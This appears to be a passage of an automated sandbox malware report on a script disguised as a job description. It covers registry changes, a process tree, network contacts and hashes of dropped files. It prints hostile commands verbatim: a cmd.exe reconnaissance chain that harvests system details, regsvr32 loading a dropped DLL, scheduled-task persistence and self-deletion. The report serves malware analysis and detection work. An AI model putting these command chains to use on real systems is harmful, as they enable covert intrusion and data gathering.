"wscript.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"wscript.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"msxsl.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
"msxsl.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112 (Show technique in the MITRE ATT&CK™ matrix)
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
-
"WINWORD.EXE" opened "\Device\KsecDD"
"regsvr32.exe" opened "\Device\KsecDD"
"schtasks.exe" opened "\Device\KsecDD"
"msxsl.exe" opened "\Device\KsecDD"
"WMIC.exe" opened "\Device\KsecDD"
"tasklist.exe" opened "\Device\KsecDD" - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1215 (Show technique in the MITRE ATT&CK™ matrix)
-
Creates or modifies windows services
-
Unusual Characteristics
-
Drops cabinet archive files
- details
-
"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 6894 bytes 1 file"
"Cab4EC3.tmp" has type "Microsoft Cabinet archive data 58806 bytes 1 file"
"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 58806 bytes 1 file" - source
- Binary File
- relevance
- 10/10
-
Drops cabinet archive files
File Details
Job Description.wsf
- Filename
- Job Description.wsf
- Size
- 488KiB (499415 bytes)
- Type
- script wsf
- Description
- HTML document, ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 556a1b6f7e124c0dbff6d0defa5c475f7854a2c0cae559ca1961c9ae4493e726
- MD5
- 9d73804b401a6eeacc1919ab1d0e6793
- SHA1
- a8fb72e2273f62e01e6cef92b96aa2b46a70dc23
- ssdeep
- 12288:f20Z90icm3lzwuNKpYXxWtT977GbqEtxs:Aic5AYWb4
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 17 processes in total (System Resource Monitor).
-
wscript.exe
"C:\JobDescription.wsf"
(PID: 3856)
- WINWORD.EXE "%APPDATA%\Microsoft\21152.doc" (PID: 3104)
-
regsvr32.exe
/s /i "%APPDATA%\Microsoft\40070.ocx"
(PID: 3904)
- schtasks.exe /Delete /F /TN "912F8A0F793" (PID: 2304)
- schtasks.exe /Create /TN "912F8A0F793" /XML "%ALLUSERSPROFILE%\Microsoft\1B2FFE2276368908.txt" (PID: 1840)
-
msxsl.exe
8CDAF1CED822.txt 8CDAF1CED822.txt
(PID: 2028)
-
cmd.exe
/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"
(PID: 172)
- WMIC.exe wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist (PID: 3556)
- findstr.exe findstr /R /C:"SerialNumber=" (PID: 3184)
- WMIC.exe wmic csproduct get Name /FORMAT:Textvaluelist (PID: 3316)
- findstr.exe findstr /R /C:"Name=" (PID: 2788)
- tasklist.exe tasklist /FO CSV /NH (PID: 3588)
- WMIC.exe wmic os get ProductType /FORMAT:Textvaluelist (PID: 1140)
- findstr.exe findstr /R /C:"ProductType=" (PID: 1764)
- ipconfig.exe (PID: 712)
- findstr.exe findstr /R /C:"IPv4 Address" (PID: 3860)
-
cmd.exe
/c wmic path win32_Operatingsystem get SerialNumber /FORMAT:Textvaluelist | findstr /R /C:"SerialNumber=" > "%TEMP%\55356.txt" & vol C: > "%TEMP%\8785.txt" & wmic csproduct get Name /FORMAT:Textvaluelist | findstr /R /C:"Name=" > "%TEMP%\23030.txt" & tasklist /FO CSV /NH > "%TEMP%\4254.txt" & ver > "%TEMP%\24760.txt" & wmic os get ProductType /FORMAT:Textvaluelist | findstr /R /C:"ProductType=" > "%TEMP%\1931.txt" & ipconfig | findstr /R /C:"IPv4 Address" > "%TEMP%\16406.txt"
(PID: 172)
- cmd.exe /c del "%APPDATA%\Microsoft\40070.ocx" >> NUL (PID: 1804)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
account.shopjobys.com
OSINT |
18.222.173.108
TTL: 599 |
GoDaddy.com, LLC
Name Server: NS27.DOMAINCONTROL.COM Creation Date: Wed, 09 Sep 2015 13:27:50 GMT |
United States |
crt.sectigo.com
OSINT |
91.199.212.52
TTL: 2412 |
CSC CORPORATE DOMAINS, INC.
Organization: Sectigo Limited Name Server: NS1.AS48447.NET Creation Date: Thu, 16 Aug 2018 17:53:22 GMT |
United Kingdom |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
18.222.173.108 |
443
TCP |
msxsl.exe PID: 2028 |
United States |
91.199.212.52 |
80
TCP |
msxsl.exe PID: 2028 |
United Kingdom |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
91.199.212.52:80 (crt.sectigo.com) | GET | crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt | GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crt.sectigo.com More Details |
Extracted Strings
Extracted Files
Displaying 21 extracted file(s). The remaining 10 file(s) are available in the full version and XML/JSON reports.
-
Clean 1
-
-
~_21152.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative Selection 11
-
-
21152.doc
- Size
- 64KiB (65536 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Internal Job Application Form, Author: gwen rogers, Template: Normal, Last Saved By: Pam Byrd, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Last Printed: Fri Feb 24 18:58:00 2012, Create Time/Date: Tue Nov 3 20:35:00 2015, Last Saved Time/Date: Tue Nov 3 20:35:00 2015, Number of Pages: 1, Number of Words: 305, Number of Characters: 1744, Security: 0
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 16958cb1a72de96fe1bdd6dbb7898d2c
- SHA1
- efeb016d37a34c49cd899bdb9e67f1676f273019
- SHA256
- b98c89a2425b3b39478ca42cfa17b9ffc537ced9f69e5621b41db1694777e415
-
40070.ocx
- Size
- 298KiB (305264 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- regsvr32.exe (PID: 3904)
- MD5
- 48b127f32e5e41d02fe5bb577744c4c3
- SHA1
- 65b716bf242549dd81d8a4ef57c39b2bd6b52543
- SHA256
- 93dfe898ccbb8968a19dd0e1cab3b13750b833edfe2ec899ee53fa914480989d
-
77EC63BDA74BD0D0E0426DC8F8008506
- Size
- 57KiB (58806 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 58806 bytes, 1 file
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 5ad071a3917588e8cd883b123b395b21
- SHA1
- 4b688617093f21879354dd662a72266c35fd3cd2
- SHA256
- de62965c15528da598b0079d2d20d953dd6f71b13a23807bff0666d03f69c0fa
-
16406.txt
- Size
- 55B (55 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 4412bf97a7b19ead46af501f6d383417
- SHA1
- 28e492fc522064c6e556f2eb2314b1c0c32dee06
- SHA256
- 5ec7ed66dd49e1d070ceb2a88223143c606bce6df8292147173870132c8576d1
-
1931.txt
- Size
- 16B (16 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 9d21048d7cf74af78d568e0f66da8a6e
- SHA1
- 34cb2e67b1a4851653619925792a227ee2117e05
- SHA256
- 384bbf2518ca73c76e60a634dd15cb6350a8afdab40acc1ffce491c68b4175a1
-
23030.txt
- Size
- 18B (18 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 3745eb823ffc065e2ee1187d5168bd57
- SHA1
- 305b2cd1a7e453d0dda2839a88af9e549a88d4da
- SHA256
- ff97324b5c69e8f2e16c498918bf1c6196d530efc1fcff49293e5efcd4b89951
-
24760.txt
- Size
- 40B (40 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 082f2e97e670228e3b323c6a3a874f40
- SHA1
- e50760edb5e88385449a44818f5726e5beed7aab
- SHA256
- 292bf366a534157e5414f344218c9df828e2f211617fc84352f3ab2564050941
-
4254.txt
- Size
- 1.8KiB (1878 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 918d7ea3606de48b1e9770a3ab1935b1
- SHA1
- 3aa4593b121dad66d0e62de3f04a46ffb577e013
- SHA256
- dafb78a49f215525a9d842eec07932562dc7f13fb9c53028ad75e38df1ad44a1
-
55356.txt
- Size
- 39B (39 bytes)
- Type
- text
- Description
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 5effe6c8e5739655a16c39824a6f40a0
- SHA1
- 31e0b9cbee987659f4ac9708ab2853afd85024ed
- SHA256
- fcdfc4e0f1558bd2022f883cb3b7d50f0c17bf7f5784a8c78e27f5784fb6eb20
-
8785.txt
- Size
- 70B (70 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 172)
- MD5
- 360a2afd1f20a0e551c6e1513c93aa27
- SHA1
- 061cce9961562b7f1fffcaf2d36291a9b710cb25
- SHA256
- a7b296ba3f728546fb1527f31826098d81c7fbe1452a329ce1e6d98330f4f583
-
desktop.ini
- Size
- Unknown (0 bytes)
- Type
- empty
- Runtime Process
- msxsl.exe (PID: 2028)
-
-
Informative 9
-
-
21152.LNK
- Size
- 1.1KiB (1127 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Dec 19 21:18:39 2019, mtime=Thu Dec 19 21:18:39 2019, atime=Thu Dec 19 21:18:39 2019, length=65536, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3104)
- MD5
- c68720b1488d132ba3f4de5d651ede0b
- SHA1
- 2a5c4cc15372c8baf6bd4a8c45499381d314466f
- SHA256
- e6a5e989e9437c9c58a658fd31745c422e57fae8e0b99f0fcc02e7b1dfc46676
-
index.dat
- Size
- 106B (106 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3104)
- MD5
- 228ec1b131a791e11c711303962054b2
- SHA1
- 6c72460b7a0a38b5dc029896c3e5217a1afbbcf7
- SHA256
- 8bac2c2bac5cf35659b38ba53d1191721605925f028c64a6be6751e2f4f09e1d
-
30D802E0E248FEE17AAF4A62594CC75A
- Size
- 1.5KiB (1559 bytes)
- Runtime Process
- msxsl.exe (PID: 2028)
- MD5
- adab5c4df031fb9299f71ada7e18f613
- SHA1
- 33e4e80807204c2b6182a3a14b591acd25b5f0db
- SHA256
- 7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676
-
57C8EDB95DF3F0AD4EE2DC2B8CFD4157
- Size
- 342B (342 bytes)
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 52abc6882a206f406d34c14804b42378
- SHA1
- b76b21a5cc2b8692fbde55ab08666f923fd544c3
- SHA256
- 55265411b6b71de9c78b705c7aef8d0c21c1b45f8f2390262a16fc0f02ae0cc9
-
5BBDA94EA59A54780CD5101BF0AF1837_75B55D50AC5471AEF49255E8D11DE15B
- Size
- 398B (398 bytes)
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 87dd162f591e0fc77f230b062aea92a6
- SHA1
- a7c8b525b0f9c59dc97c7b68a840e7d28a7f2f95
- SHA256
- baf4485d462ba4cf998e3aab7316d1be4b4a98e42600078b3ad8d4890726e551
-
07CEF2F654E3ED6050FFC9B6EB844250_426BFAC057FA3BC8F7120A426363018F
- Size
- 727B (727 bytes)
- Type
- data
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 8fc1af84c6d4786e084b4e07bfd9df3a
- SHA1
- 4955e76131ce512ad9264a00daf6f5bbb41c76b5
- SHA256
- b5714e8c3e4f5da8fc87e34257f04bba3f20b78dc05049cc3d594f8b4d0405fd
-
Cab4EC3.tmp
- Size
- 57KiB (58806 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 58806 bytes, 1 file
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- 5ad071a3917588e8cd883b123b395b21
- SHA1
- 4b688617093f21879354dd662a72266c35fd3cd2
- SHA256
- de62965c15528da598b0079d2d20d953dd6f71b13a23807bff0666d03f69c0fa
-
Tar4EC4.tmp
- Size
- 142KiB (145767 bytes)
- Type
- data
- Runtime Process
- wscript.exe (PID: 3856)
- MD5
- fe89f18dcbc1bd6573e49a2221389694
- SHA1
- dd884349dd55c170460eb58fc8b2d7d0d3db1f20
- SHA256
- 6ff151546711862351137b646c09b5845979972079e68d00d0bc499540f58934
-
~_Normal.dotm
- Size
- 162B (162 bytes)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
Notifications
-
Runtime
- Extracted file "21152.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/b98c89a2425b3b39478ca42cfa17b9ffc537ced9f69e5621b41db1694777e415/analysis/1576790625/")
- Not all file accesses are visible for WMIC.exe (PID: 1140)
- Not all file accesses are visible for WMIC.exe (PID: 3316)
- Not all file accesses are visible for WMIC.exe (PID: 3556)
- Not all file accesses are visible for cmd.exe (PID: 172)
- Not all file accesses are visible for cmd.exe (PID: 1804)
- Not all file accesses are visible for findstr.exe (PID: 1764)
- Not all file accesses are visible for findstr.exe (PID: 2788)
- Not all file accesses are visible for findstr.exe (PID: 3184)
- Not all file accesses are visible for findstr.exe (PID: 3860)
- Not all file accesses are visible for ipconfig.exe (PID: 712)
- Not all file accesses are visible for regsvr32.exe (PID: 3904)
- Not all file accesses are visible for schtasks.exe (PID: 1840)
- Not all file accesses are visible for schtasks.exe (PID: 2304)
- Not all file accesses are visible for tasklist.exe (PID: 3588)
- Not all sources for indicator ID "api-12" are available in the report
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "binary-0" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "registry-1" are available in the report
- Not all sources for indicator ID "registry-17" are available in the report
- Not all sources for indicator ID "registry-18" are available in the report
- Not all sources for indicator ID "registry-19" are available in the report
- Not all sources for indicator ID "registry-25" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Not all sources for indicator ID "string-24" are available in the report
- Some low-level data is hidden, as this is only a slim report